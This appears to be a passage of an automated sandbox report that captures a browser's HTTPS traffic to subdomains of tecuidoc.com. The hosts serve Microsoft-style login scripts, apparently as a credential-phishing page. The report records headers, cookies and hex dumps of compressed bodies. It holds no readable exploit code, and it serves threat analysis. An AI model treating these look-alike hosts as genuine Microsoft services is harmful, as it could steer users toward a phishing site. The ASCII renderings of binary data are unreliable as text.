                                              2024-04-26 14:56:43 UTC16384INData Raw: 3f df d9 4f e4 8e b2 79 a5 39 8b f5 ae 3b 78 d3 80 7b 8d 06 f6 9c ae d9 e9 0b 9b 1e 85 a4 57 20 c5 1c a2 87 3d 4d 5c 44 9b 11 cd 56 94 ed 4b e4 f0 18 a9 7b 11 f9 3a 0a c7 67 ee a3 8d ce 8d 89 9f 82 d0 4e 0e 8d fc 52 27 7c 3c 93 6f 66 fc ec c4 1e 13 17 c9 21 f5 85 ae c1 5e 39 1f 17 63 d8 b6 7f c3 97 fd a2 30 97 9f 5f f3 c5 00 92 32 be 2a 32 c5 98 9f fc 2e 12 bf a2 73 30 b5 d3 db 44 21 14 be 56 20 89 e4 b9 bb c3 6a 60 e7 5f 30 66 fa 58 93 e8 78 a1 09 e5 ad 4b 72 3c 2f b4 d1 30 3c af 8b 2d a4 66 55 11 8d b4 23 28 78 0c 79 74 88 43 bc 72 32 af 8b 5d e5 10 6f ba 79 35 eb 89 ff 19 a3 e6 9b 8d f0 11 34 04 c2 7e 59 75 4f 55 4f 01 bd 01 50 84 12 9b cf fa f4 11 30 21 08 b8 ad d8 02 37 83 9a 78 22 da 3d 69 71 b5 c3 c0 e2 b4 00 b2 1d 96 14 78 01 8c 7c bb e8 82 1e 75
                                              Data Ascii: ?Oy9;x{W =M\DVK{:gNR'|<of!^9c0_2*2.s0D!V j`_0fXxKr</0<-fU#(xytCr2]oy54~YuOUOP0!7x"=iqx|u
                                              2024-04-26 14:56:43 UTC16384INData Raw: dd cb 1a 71 6d d4 89 4b 11 89 b1 cf 36 69 f8 5d b9 a8 c6 c1 e9 ca 35 8d b5 05 1d b7 6a ef f4 1e 54 6e 17 6d 26 e0 84 ee 5a 43 ca 5c 2c 6b a9 f5 d5 46 d5 06 d2 7c ea 5d 00 c5 2c a2 c9 3c ef dc 21 5c ce b9 00 24 31 11 9e d7 72 9f e9 b3 59 7d cc 64 cc 1f fb 6d c5 08 2c f9 e3 74 77 b5 7f 7b a5 55 1a d0 7e 7e 8e e9 7a 6c 73 4e 91 a1 8f e1 b1 6d f8 70 8e c9 6c d9 04 f4 a6 0c f0 07 74 75 d7 03 70 84 0f 33 79 9b 5e 63 35 c8 06 7a 97 ee d5 ed 9d 61 d7 43 d5 cf f7 6d 88 7f 97 51 5e f7 27 03 10 8e 5e 08 40 08 4f e5 ea 7a e1 f1 1f 7e f3 e3 9f bc f0 f8 7f 6b 8b 7f 5b bc 85 22 5e 39 d6 a4 17 be f0 6d c4 19 e1 0d d1 d7 a9 04 55 84 c1 f0 3c c9 1e 8b ee 12 b0 40 7a 1b 0e 87 e4 d5 9c 10 c2 62 76 5e 7f 7e 19 78 89 28 f3 63 98 de 54 8d 01 f2 4f 61 88 e9 28 44 6e 0e 9d f9 b7
                                              Data Ascii: qmK6i]5jTnm&ZC\,kF|],<!\$1rY}dm,tw{U~~zlsNmpltup3y^c5zaCmQ^'^@Oz~k["^9mU<@zbv^~x(cTOa(Dn
                                              2024-04-26 14:56:43 UTC16384INData Raw: 42 af cb b1 38 e4 0a f7 d6 09 95 0c e1 9c 83 5a 0c 81 30 a8 ed 2b 80 2c 2c 18 bd 0f f9 4a e9 b0 d4 b9 4a 61 fb 47 ed 00 60 42 cd 1c 90 a0 08 17 92 ab 66 fd 7f 8d f8 de bf 46 9c 6d 24 b5 c3 21 2d ec e6 30 48 2b 5f ba a8 b1 36 a6 24 79 77 9c 74 0f 0f 63 0f 6a d9 27 1d 61 c5 44 99 d3 61 ca 8e ec be 8a ab 8b 3c 2c 73 1e ff d3 6b 60 35 21 a9 2d f0 33 6f f8 e2 e6 4c 0c d7 2a 9e f0 7e ea c7 0b 4e d6 30 e7 88 09 ea c4 5c e1 ca 71 5a 32 6f 12 94 c2 e6 72 93 2f 3a 9c 3c d5 e6 9a 0f e7 8e eb 87 9c 3d 77 14 cc bb d2 fe b5 df 4d 1c 7a 49 12 1e 74 39 14 00 46 69 31 60 92 d9 e5 f2 15 32 18 55 e2 b0 31 8c ce 62 38 f9 77 95 e3 b0 80 70 21 ab 9e 7f 63 39 db ae 00 b1 3c ab 41 ca 29 b2 bd ee 85 a7 fc f0 cc 75 24 c7 b7 bd f3 2d c1 3f 46 08 bf 56 bd 62 4e 8e fb 3b c4 2b 20 3a
                                              Data Ascii: B8Z0+,,JJaG`BfFm$!-0H+_6$ywtcj'aDa<,sk`5!-3oL*~N0\qZ2or/:<=wMzIt9Fi1`2U1b8wp!c9<A)u$-?FVbN;+ :
                                              2024-04-26 14:56:43 UTC9977INData Raw: 6c e0 fe 45 24 12 97 7f af 0e a9 5d e6 9d 88 5e e5 fe ab 98 f8 66 16 79 fc d7 b1 37 ae 64 1a ff 7d bc f0 b2 d2 bc ba f0 26 34 8a fa 2a d4 c2 8c ff 8e 8a 5d 26 33 9c 70 74 7e 8e 89 1d d3 ed f1 27 f1 b0 ab 91 3e c9 c8 fa b4 f4 b7 63 66 91 26 c0 fa c9 ae e2 d4 27 92 14 aa b8 ce 50 e2 3a 71 87 ba 36 6f 8d b0 cf b6 4e 0f de eb 7a b5 a1 9d e1 0d d1 58 16 6a a8 3d 85 0f dd e1 0d 73 ba e6 9a ba 55 31 90 78 05 4b 14 77 3e 58 ac 0b fc 2f fd 55 67 f5 0e 47 c1 5d ac 8e 9d 22 3a 48 75 c9 82 1a 25 71 69 95 14 2b a2 fb 49 46 fd f5 8f 68 f1 1c 21 ac 24 04 5c aa 2e 71 c0 8c 38 5c e4 87 f4 f0 92 f8 68 9a 5a 7e 8b 67 8d cf bd c4 12 22 fd fd d8 eb 60 52 fc 1d cc af 30 be 55 67 8a 6d 19 84 05 c9 d1 ee bd 63 f2 86 1f 20 17 01 31 0b 02 74 ea 32 e7 70 90 c6 f0 b8 dc 62 7f 23 5a
                                              Data Ascii: lE$]^fy7d}&4*]&3pt~'>cf&'P:q6oNzXj=sU1xKw>X/UgG]":Hu%qi+IFh!$\.q8\hZ~g"`R0Ugmc 1t2pb#Z
                                              2024-04-26 14:56:43 UTC15472INData Raw: d9 4f 67 90 18 5c 06 c2 c5 24 01 d7 31 89 be 70 39 4c eb 58 a4 56 28 dc 60 2f 8a b2 89 1c 48 20 d7 39 08 98 c3 46 63 e0 43 51 e0 60 0a 61 48 61 80 4e 16 7b 7b ea 2c 89 1d 2f b0 43 e8 e3 6e 16 db 10 b6 60 18 d0 91 a1 8c 31 0b 5a a0 b3 17 8b d0 ad 35 a3 10 e2 d6 0d a0 7a b1 00 53 c9 20 19 43 ee ba e0 83 19 a6 90 ef a9 b3 c4 82 b4 4d d1 2c 73 c0 16 1c 0b b2 c3 0e 64 60 b9 3e 64 89 07 24 d9 4b 37 4b 9f 11 17 ae cb ad 80 22 d6 5c 98 b5 31 f0 cf 41 3f 01 ed 02 ec c7 d2 70 e3 84 ec cd 80 5b a9 c4 0a b9 0c 16 1b 44 55 1a 42 9b b4 3d 0f 9a c5 5e fc ff 5e 4d 4e 69 ea b1 d4 f1 3c 50 51 28 59 64 39 02 c6 6e 14 67 98 58 19 ec 65 48 e0 7a 22 90 21 34 09 c9 6d 3f 85 b1 26 b8 0d d3 06 06 15 18 ba 6f 79 7b 21 5a 13 f9 02 95 85 bb be 84 8c 02 22 84 ae 0d 79 0b d5 01 68 e7
                                              Data Ascii: Og\$1p9LXV(`/H 9FcCQ`aHaN{{,/Cn`1Z5zS CM,sd`>d$K7K"\1A?p[DUB=^^MNi<PQ(Yd9ngXeHz"!4m?&oy{!Z"yh
                                              2024-04-26 14:56:43 UTC16384INData Raw: 5c a5 8a 4d cd bd bc 16 89 fc 3e a2 e2 4b 71 77 a8 07 33 ac c4 63 36 63 f3 0f 3f e9 14 0c 4d 8f f0 97 e5 f8 15 af e7 1a 88 03 ae a0 38 78 57 83 f1 85 25 00 25 72 58 1d f9 a3 2a c9 43 33 c6 60 63 b1 df 7c ff e0 6b 40 9c 17 67 74 4d 50 5e b2 f3 34 3f bd 6c a3 cb f5 6d 2b 6a e4 40 b4 5a f9 93 ec 11 4c 0b be ae 8b 9b 97 1b 8d a5 df 28 26 f9 df 73 c7 eb bb f7 0c 8c 8e ee dd fb 82 4e 82 e9 7b 46 9c 8c 7a f9 c2 98 fc 85 b4 ca df 2d 98 e5 76 8b 0a 72 d8 95 0b 41 cb f9 fa 79 d0 0e c1 d1 cc b4 5f 59 39 cd a8 68 7c 5b 4e e0 36 bb e7 36 fa e8 fe f8 d9 b5 75 d4 cf d7 7f a1 72 33 af 59 46 9d 25 be f8 fe 8b 90 e5 db 45 71 71 52 16 4f 7f 95 fc 72 b1 e2 15 5a ff fc f9 76 74 ca e6 4d cd e8 af 5f 88 ff 7f 11 ea 36 8d df 8e ae 0d d8 5f 9a a2 bf 2a fc 6c 96 ad 2e 3d d9 d8 56
                                              Data Ascii: \M>Kqw3c6c?M8xW%%rX*C3`c|k@gtMP^4?lm+j@ZL(&sN{Fz-vrAy_Y9h|[N66ur3YF%EqqROrZvtM_6_*l.=V
                                              2024-04-26 14:56:43 UTC7434INData Raw: da f9 8d 3c 93 6d a0 fc 60 35 26 9f 5b 81 94 ea 87 4a 7d f0 77 c7 64 a2 54 34 fd 7a 02 12 24 48 50 73 4e 3d f6 7f 32 5e 8a 6e f7 49 dc e9 de 3d 25 4f 9e 74 a2 de e1 25 1a ab e6 53 20 ab d8 6a d8 f9 ea 2b 9c 60 7f 49 ee ba bd bf a7 d0 fa 57 40 fa fd 1f 0d 7a 16 73 1c ec 1f f6 8e d8 b7 14 e5 b0 99 ca 42 ef 8c 08 65 51 c3 ed 71 27 22 3e 0e 9e a6 a8 8b 87 c7 30 a1 fd fb 4d 6e 71 bd c4 03 f7 7d 62 84 ca a4 8c 6b 85 82 06 fb 97 c4 98 fb 51 b0 3f 23 46 4a c9 d7 fe 0d 31 7c 4e a3 f6 3f 42 fd 32 e1 da 7f 07 e0 2f 53 ad fd 53 a8 7f 4d 77 e2 a1 3b 9f a3 e9 6a 3f 36 42 26 3c e5 4f b2 bb a7 38 f6 cb 4e d4 ed 61 1c 63 3e e5 0e 9b 6c dc ed f6 80 01 c6 9d 2c 36 dc b8 7b 97 af 78 26 4f 1e e7 09 d8 b3 f3 1b ac 0e 41 e1 19 f6 c1 02 89 02 ae 00 2c 18 99 56 9e 62 a6 ab af 7c
                                              Data Ascii: <m`5&[J}wdT4z$HPsN=2^nI=%Ot%S j+`IW@zsBeQq'">0Mnq}bkQ?#FJ1|N?B2/SSMw;j?6B&<O8Nac>l,6{x&OA,Vb|


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.649727198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:39 UTC656OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_l2bvdjfwt697xziuhxpwsg2.js HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://srmcorp.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:42 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:42 GMT
                                              Content-Type: application/x-javascript
                                              Content-Length: 15799
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Thu, 28 Mar 2024 02:23:53 GMT
                                              etag: 0x8DC4ECE1D0444D4
                                              x-ms-request-id: 87a28f14-301e-007d-5d7b-91c885000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145641Z-186b7b7b98dwc44t042bcz2h9c0000000c9g00000000hmpc
                                              x-fd-int-roxy-purgeid: 0
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:42 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 4d 73 23 47 b2 d8 dd bf 02 8b 75 68 86 4f 3d 10 3e f8 89 11 34 06 01 70 06 4f 24 00 01 e0 50 0a 49 46 34 81 22 d8 4b a0 1b af bb 31 1c 2e 35 8e bd f9 f0 0e be da 37 1f 7c f2 d1 17 df fd 53 36 e2 f9 77 38 3f aa aa ab ba 1b 00 39 d2 d3 ee b3 42 c1 41 77 55 65 65 65 65 65 65 66 65 65 ff e1 66 ed 4f 63 2f f0 5f 8a bd 47 f5 bb 10 bc f4 f7 1e bd 9b 97 de 8f fe cf 7b a1 88 d7 a1 5f c0 df 25 f1 71 15 84 71 f4 fa 83 1b 16 e2 06 be 6a 3c ca 77 f5 c7 4f 8e 37 ab fb ce 22 70 67 62 56 ff 43 e5 d3 6b d9 54 60 d3 a9 bb 58 bc 8c 15 04 27 76 92 df c1 1e 3c 70 b3 c6 1f ca 49 c1 27 ec c6 6b 3c 6a 40 41 69 d9 10 4e 50 9a 36 3c f8 bb 6a 14 8b 4e f0 b2 bc f7 e9 e5 8f c9 30 9c c0 f1 00 f9 97 d5 3d c2 d2 6f 78 2f 2b 00 1f fe 39 d8 73 42 f8 e7
                                              Data Ascii: }Ms#GuhO=>4pO$PIF4"K1.57|S6w8?9BAwUeeeeeefeefOc/_G{_%qqj<wO7"pgbVCkT`X'v<pI'k<j@AiNP6<jN0=ox/+9sB
                                              2024-04-26 14:56:42 UTC221INData Raw: 62 0a fb 14 83 a4 1d 47 7a 4c d9 50 88 3d 11 31 a3 82 91 44 92 9b ac 27 fa 55 71 d0 e8 52 b2 83 36 27 fc b6 dc 23 94 e3 1e 80 37 6e 69 ad 92 7b 01 76 8e 29 d0 a4 f3 81 4e a5 61 fe e9 d7 44 09 47 be c4 aa 78 02 e5 da 24 f0 cf 03 17 6f 15 81 0e 9b 57 59 59 50 76 65 74 81 91 0e 08 e2 ca 8f 9f d0 09 e6 cc 63 f5 01 0c 1d b1 ff ac b6 da 7e a0 7c 70 78 3f 7a 67 ef 29 ac ad fb a8 08 00 af bb ab 0b 46 ef 41 74 8a 4c fb 39 f7 de 8d 28 4c 4b db fa 95 7d d4 f5 b7 b4 b4 70 4f 6e 04 ef ef ec d2 6a c8 b3 29 ad 7d 6c 5b d9 81 ae 31 dc 64 9c fb e5 ea ce 71 1a 0d 53 9d 56 9f d3 e9 b7 17 a3 2e 37 aa 7e fa f4 f3 9e c3 b9 43 4b 93 49 e3 0f e5 d7 ff 0f de d8 74 96 1f d7 00 00
                                              Data Ascii: bGzLP=1D'UqR6'#7ni{v)NaDGx$oWYYPvetc~|px?zg)FAtL9(LK}pOnj)}l[1dqSV.7~CKIt


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.649729198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:41 UTC367OUTPOST /api/report?catId=GW+estsfd+ams2 HTTP/1.1
                                              Host: 7457d826-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              Content-Length: 442
                                              Content-Type: application/reports+json
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:41 UTC442OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 31 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 72 6d 63 6f 72 70 2e 74 65 63 75 69 64 6f 63 2e 63 6f 6d 2f 3f 50 53 5a 6c 6b 3d 56 69 50 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 39 38 2e 35 38 2e 39 39 2e 33 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f
                                              Data Ascii: [{"age":216,"body":{"elapsed_time":3230,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://srmcorp.tecuidoc.com/?PSZlk=ViP","sampling_fraction":1.0,"server_ip":"198.58.99.33","status_code":404,"type":"http.error"},"type":"netwo
                                              2024-04-26 14:56:48 UTC392INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:48 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 70
                                              Connection: close
                                              vary: Accept-Encoding
                                              request-context: appId=cid-v1:c242839f-7b23-4fcd-8b70-f19e1d322576
                                              access-control-allow-credentials: false
                                              access-control-allow-methods: *, GET, OPTIONS, POST
                                              access-control-allow-origin: *
                                              content-encoding: gzip
                                              2024-04-26 14:56:48 UTC70INData Raw: 1f 8b 08 00 00 00 00 00 00 03 f3 73 f5 51 70 4c 4f 2f 4a 4d 4f 2c c9 2f 52 c8 48 2c 56 28 2e 4d 4e 4e 2d 2e 4e 2b cd c9 a9 54 28 28 ca 07 71 52 53 14 4a 32 52 15 8a 52 0b 4b 53 8b 4b 00 48 8c 5e 6b 35 00 00 00
                                              Data Ascii: sQpLO/JMO,/RH,V(.MNN-.N+T((qRSJ2RRKSKH^k5


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.649730198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:43 UTC799OUTGET /Me.htm?v=3 HTTP/1.1
                                              Host: l1ve.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Purpose: prefetch
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:46 UTC514INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:46 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 1159
                                              Connection: close
                                              cache-control: max-age=315360000
                                              vary: Accept-Encoding
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-ms-route-info: C517_BL2
                                              x-ms-request-id: 50c7ddc5-ff39-4720-8d0e-c1e0f266b052
                                              ppserver: PPV: 30 H: BL02EPF0001D7CF V: 0
                                              content-encoding: gzip
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:46 UTC1159INData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6b 8f da 46 14 fd 9e 5f 01 56 84 66 ca d4 8b 79 2d 6b 76 36 aa 92 56 21 6a 1e ca a6 ea 07 c7 95 66 ed 6b 98 d6 cc 58 33 03 49 c4 fa bf f7 fa 05 6c aa 14 21 8c b9 8f 33 e7 5c ee bd f8 d6 26 46 16 ae e7 be 15 c0 3d 07 5f dd d5 df 62 2f 1a ab 77 f7 ac d7 cf 76 2a 71 52 2b a2 98 a3 87 4c 1b b2 17 a6 07 3d a9 7a 8e aa 08 62 ee f0 52 12 b7 91 96 9d 82 31 b4 bd ef 39 22 e9 41 66 04 22 19 53 03 6e 67 54 af ba f7 e1 6b a1 8d b3 cb 0a d0 f2 ca c4 0f ad 2d 3c 94 4c a6 a1 64 b9 16 29 a4 61 3f 28 97 6d aa aa 52 13 91 e7 c4 76 08 0c 5f c7 7b 47 f1 4b 93 c6 fb a3 93 a3 ac 79 f3 c3 11 c8 f9 5b 8e a2 fc 84 03 5e 0b ee 79 cc 91 11 2d 49 f4 9d e6 4e 08 d4 b2 da 0a 38 be 8e 92 98 01 1f 31 c9 9d 9f 83 5a bb cd 12 6e e5 72 38 04 8a 72 ab b2
                                              Data Ascii: VkF_Vfy-kv6V!jfkX3Il!3\&F=_b/wv*qR+L=zbR19"Af"SngTk-<Ld)a?(mRv_{GKy[^y-IN81Znr8r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.649731198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:44 UTC698OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                              Sec-WebSocket-Key: CliIjj9qMQL/zo1vDoBuQQ==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:56:46 UTC737INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:46 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: bd031e1d-9d1e-41fb-9edf-a29853d20c01
                                              x-ms-ests-server: 2.1.17846.6 - FRC ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.649732198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:44 UTC744OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_7f0a8c2a247460fad87f.js HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:47 UTC806INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:47 GMT
                                              Content-Type: application/x-javascript
                                              Content-Length: 54365
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Thu, 15 Feb 2024 19:13:15 GMT
                                              etag: 0x8DC2E5A2998EB1D
                                              x-ms-request-id: 1a603341-901e-005b-5f8b-91a3ba000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145646Z-186b7b7b98dxx7m8xww8rv5t5c0000000c8g00000000us97
                                              x-fd-int-roxy-purgeid: 0
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:47 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 7b db 46 92 30 fa 7d 7f 05 85 67 46 06 4c 90 22 a9 8b 65 52 10 c7 76 92 79 bd 4f 12 fb d8 ce bc 67 8f cc c9 03 81 a0 84 98 02 b8 b8 d8 d6 88 dc df 7e aa aa ef 40 83 92 af c9 66 3c bb b1 88 46 a3 2f d5 dd d5 75 af bd fb 3b ff d1 b9 df e9 dd fd 7f 9d 97 af 1e bd 78 d5 79 f6 43 e7 d5 ff 79 fa e2 bb ce 73 78 fa af ce cf cf 5e 3d 7d f2 fd dd db c1 4e f1 bf 57 97 49 d1 59 24 cb b8 03 7f cf c3 22 9e 77 b2 b4 93 e5 9d 24 8d b2 7c 95 e5 61 19 17 9d 2b f8 37 4f c2 65 67 91 67 57 9d f2 32 ee ac f2 ec b7 38 2a 8b ce 32 29 4a f8 e8 3c 5e 66 ef 3a 2e 34 97 cf 3b cf c3 bc bc ee 3c 7d ee f5 a1 fd 18 5a 4b 2e 92 14 be 8e b2 d5 35 fc be 2c 3b 69 56 26 51 dc 09 d3 39 b5 b6 84 87 b4 88 3b 55 3a 8f f3 ce bb cb 24 ba ec fc 94 44 79 56 64
                                              Data Ascii: k{F0}gFL"eRvyOg~@f<F/u;xyCysx^=}NWIY$"w$|a+7OeggW28*2)J<^f:.4;<}ZK.5,;iV&Q9;U:$DyVd
                                              2024-04-26 14:56:47 UTC14460INData Raw: e2 6d da 0d 13 61 5e 68 9c 5f 9b d0 97 b3 ca a7 db 3d 7e fb 55 fa eb b1 fe ce 9b 1b f1 83 bc b2 a0 89 b0 b1 bf 3e c4 63 8d 70 5e 3d 15 a6 10 88 9a be 66 c2 cc 52 68 86 75 0c 52 9a 06 95 86 eb 02 39 a6 35 11 02 33 e8 b9 83 f5 64 da 62 3d c9 ec 26 c7 46 cd dc 43 33 67 51 93 f5 a0 aa d3 b3 92 0d e2 b9 09 df 59 b3 ac 90 e9 72 a2 23 fa 9a 15 33 7e 9b 65 c6 de 6c 31 94 b5 1b c3 12 76 e0 9e 74 c6 e2 7d 46 17 3a dc cf 86 d1 78 8b b0 99 be d4 ac 0a 2c 1e 27 e2 e2 b7 f9 66 10 69 c0 6c 9f 63 52 82 71 07 0c d4 85 4d 81 1a 1f a2 3a 6c e8 8d 73 cd 01 83 b9 47 f9 42 9d b8 d1 c7 fa f8 ba 49 f1 6f f7 81 d9 6e a6 6f f5 80 c9 eb b3 b6 3b 23 e4 ad 4e 00 b9 92 32 03 06 26 b1 ac 41 7d 56 5b 48 f7 d1 76 d2 fd ae 54 2d fa c3 10 93 41 c4 ec 76 26 83 5b 4e 9b 7b bd 41 bc d5 6d 20
                                              Data Ascii: ma^h_=~U>cp^=fRhuR953db=&FC3gQYr#3~el1vt}F:x,'filcRqM:lsGBIono;#N2&A}V[HvT-Av&[N{Am
